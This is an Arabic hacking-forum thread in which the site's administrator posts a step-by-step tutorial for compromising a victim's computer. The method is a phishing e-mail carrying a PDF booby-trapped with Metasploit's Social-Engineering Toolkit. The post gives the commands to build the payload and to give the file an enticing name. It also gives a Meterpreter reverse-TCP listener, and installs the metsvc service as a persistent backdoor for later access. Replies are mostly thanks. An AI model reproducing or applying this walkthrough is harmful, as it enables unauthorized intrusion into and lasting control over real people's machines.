منتديات امان سوريا || www.sy-team.com/vb

اهــــلا وســـــــــــهـلا بــــكم اتــمنى ان تـــقدو أســــــعد الأوقــات فـــ مــنـتـدى امـــان ســـــــوريـــا.أنت غير مسجل أختر أحد الأخيارت في الأسفل

أهلا وسهلا بكم منتدى امان سوريا www.sy-team.com

تــــم أفــتــتــاح مــنــتــدى امــان ســـــوريا الــجـديــد تـفـضـلـو بـدخــــول WWW.SY-TEAM.COM ____________________________________ SyriaSecurity

_____________________________________________
|iNFO : Security / Hacking - arab & English Board - Mr.MooN " cf3@hotmail.com|





About

Welcome to syria security, a nice community about hacking / security / pentesting. If you are looking for a
serious & clean board, where you can learn about these domains, here it's the best choice that you can do.



| FORUM |


syria Security

Security and Hacking

ـٍـ UPLOAD ـٍـ                                                                                     ـٍـ FORUM ـٍـ

About
Welcome to syria security
a nice community about hacking security If you are looking for a
serious and clean board where you can learn about
these domains, here it s the best choice that you can do


    حصريا : الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !

    شاطر

    Mr.MooN
    مدير
    مدير

    رقم العضوية : 1
    الميزان تاريخ الميلاد : 22/10/1986
    تاريخ التسجيل : 05/06/2010

    حصريا : الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !

    مُساهمة من طرف Mr.MooN في 25/9/2010, 11:54 am

    بسم الله الرحمن الرحيم ..

    اعود اليكم احبتي في الله بعد غياب طويل بسبب ضروف الدراسة التي لازمتني رغما عني ..

    عموما .. ان شاء الله اليوم الدرس يعوض ولو شيء بسيط بعد هالغيبة الطويلة عن المنتدى !

    اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميتنيك

    بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

    بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

    ================================================== ========

    نرجع لموضوعنا ..

    كيف تتم العملية ؟

    1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
    2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
    3-ارسال الملف لبريد الضحية على الانبوكس
    4-التنصت و الانتظار حتى يتم الاتصال بالضحية

    ماهي الادوات اللازمة للقيام بالعملية ؟


    1-Social-Engineering Toolkit
    2-Gmail account
    3-M3tasploit

    طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

    نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

    كود:

    svn co [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SET/

    ملاحظة : يجب ان تكون root ..

    صورة للتوضيح بعد تطبيق الامر و تكوين المجلد :
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
    الان ندخل على مجلد الاداة بالامر :

    كود:

    cd SET

    من ثم نشغل الادة عن طريق الامر :

    كود:

    ./set

    و هذي صورة توضيحية للامرين ..
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

    اشرح لكم الخيارات ..

    الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

    الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

    و الخيارات الباقية للتحديث و صنع بايلودات ..

    عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

    نختار الخيار الاول بالرقم 1 و نشوف :
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
    مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم

    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

    الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

    نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

    و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
    الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

    نضغط انتر لاستكمال العملية و ارسال الملف

    بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

    الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

    طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

    الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
    اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

    نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

    بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

    طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


    بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

    نحدده و نتبع الخيارات المتبقية ..

    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
    بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..

    الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

    .. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

    طيب الان نتنصت لانتظار الضحية بالامر :

    كود:

    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E


    الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]


    اضافة بسيطة و مفيدة جدا

    و هي ثبات الضحية و المقدرة للرجوع اليه في اي وقت تحبه .. وهو ما يعرف بالـ metsvc

    حلوو ..

    بعد ما وصلنا لجهاز الضحية مثل ماهو وآضح فوق راح ننفذ امر بسيط جدا لتثبيت خدمة الـ metsvc

    كود:

    run metsvc


    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

    لان بعد تنصيب الخدمة و في حال خروج الضحية ..

    تقدر ترجع للضحية بالامر التالي :

    كود:

    ./msfcli exploit/multi/handler PAYLOAD=windows/metsvc_bind_tcp LPORT=31337 RHOST=192.168.1.3 E

    بحيث RHOST= اي بي الضحية و LPORT= البورت تبع الخدمة وهو ثابت

    نلاحظ الصورة
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

    تحياتي اخوكم:Mr.Moon


    __________التوقيع__________




    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]




    تــــم أفــتــتــاح مــنــتــدى امــان ســـــوريا الــجـديــد تـفـضـلـو بـدخــــول [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]








    إن دعــتــك قــدرتــك عــلــى ظــلــم الــنــاس فــتــذكــر قــدرت الله عــلــيــك



    eMil:cf3@HoTmAiL.CoM

    salam
    عضو تقدير امان سوريا
    عضو تقدير امان سوريا

    رقم العضوية : 257
    الحمل تاريخ الميلاد : 22/03/1991
    تاريخ التسجيل : 02/04/2010

    رد: حصريا : الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !

    مُساهمة من طرف salam في 26/9/2010, 6:47 am

    يسلمووووووووو كتير مون


    موضوع رائع رائع رائع

    Mr.MooN
    مدير
    مدير

    رقم العضوية : 1
    الميزان تاريخ الميلاد : 22/10/1986
    تاريخ التسجيل : 05/06/2010

    رد: حصريا : الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !

    مُساهمة من طرف Mr.MooN في 26/9/2010, 7:45 am

    مشكووووره على رد عيوني


    __________التوقيع__________




    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]




    تــــم أفــتــتــاح مــنــتــدى امــان ســـــوريا الــجـديــد تـفـضـلـو بـدخــــول [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]








    إن دعــتــك قــدرتــك عــلــى ظــلــم الــنــاس فــتــذكــر قــدرت الله عــلــيــك



    eMil:cf3@HoTmAiL.CoM

    Mr.7aSoN
    مدير
    مدير

    رقم العضوية : 498
    الجدي تاريخ الميلاد : 01/01/1990
    تاريخ التسجيل : 19/04/2010

    رد: حصريا : الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !

    مُساهمة من طرف Mr.7aSoN في 28/10/2010, 5:43 am

    مشكورررررررر صديقي احلا شي ميتا سبلويت بس والله بتعب الجهاااز

    Smile


    __________التوقيع__________




    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



    لا يجــب أن تقول كل ما تعـــرف ... ولكن يجـــب أن تعــرف كل ما تقــول


    Add Me
    sy_@h-tmail.com

    l_--@hotmail.com



    تم افتتاح امان سوريا جديد أنتقلو ألى هناك

    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    Mr.A7mAd
    الــمـشـــرف الــعــام
    الــمـشـــرف الــعــام

    رقم العضوية : 2
    السرطان تاريخ الميلاد : 11/07/1993
    تاريخ التسجيل : 21/09/2010

    رد: حصريا : الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !

    مُساهمة من طرف Mr.A7mAd في 28/10/2010, 6:30 am

    مشكور اخونا موون سلمت يداك والله موضوع راائع ويستحق التقيم + Smile


    __________التوقيع__________




    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    اطـلـب ماتـريده من توااقيع فلآشية + برامج + تصاميم + الي يخطر ببالك
    Mx.1@HoTmAiL.CoM



    تم انتقال ألى منتدى امان سوريا الثاني تفضلو بدخول
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    syrianhackers

    السرطان تاريخ الميلاد : 03/07/1983
    تاريخ التسجيل : 30/06/2012

    رد: حصريا : الاختراق بالهندسة الاجتماعية عن طريق الـ M3tasploit بإحترافية عالية !

    مُساهمة من طرف syrianhackers في 30/8/2012, 10:37 am

    مشكور حبيبي بس ثغرات الpdf تسكرت من زمان لان هية ثغرة ادوبي ريدر و كانت تشتغل على ادوبي ريدر 9 و مادون و ممكن كمان تساوي الاحقة mp3 او doc شكرا على موضوعك الجميل

      الوقت/التاريخ الآن هو 8/12/2016, 1:56 pm